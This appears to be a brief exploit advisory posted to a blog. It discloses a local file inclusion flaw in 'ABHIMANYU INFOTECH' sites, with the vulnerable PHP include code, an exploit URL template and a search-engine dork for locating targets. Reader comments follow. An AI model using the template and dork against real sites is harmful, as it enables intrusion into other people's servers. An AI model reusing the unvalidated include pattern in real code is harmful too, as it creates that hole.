LFI to RCE via access_log injection

ABHIMANYU INFOTECH LFI Vuln [private script]

[o] ABHIMANYU INFOTECH Local File Inclusion Vulnerability

Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com


[o] Vulnerable File

index.php

if(isset($_REQUEST['file']))
{
$file=$_REQUEST['file'];
}
else
{
$file="home.php";
}
?>


[o] Exploit

http://localhost/[path]/index.php?file=[LFI]


[o] Dork

"ABHIMANYU INFOTECH"

Comments

millo said…
tuh bug apa mas ? jomla apa ecommerce ?

^_^
evilc0de said…
bukan joomla.. bukan juga ecommerce.. :))
labatterie said…
They can be written in any programming language, although scripting languages are often used.
Thank you for sharing with us. The content is very good and helpful for me, I learn and know more about it.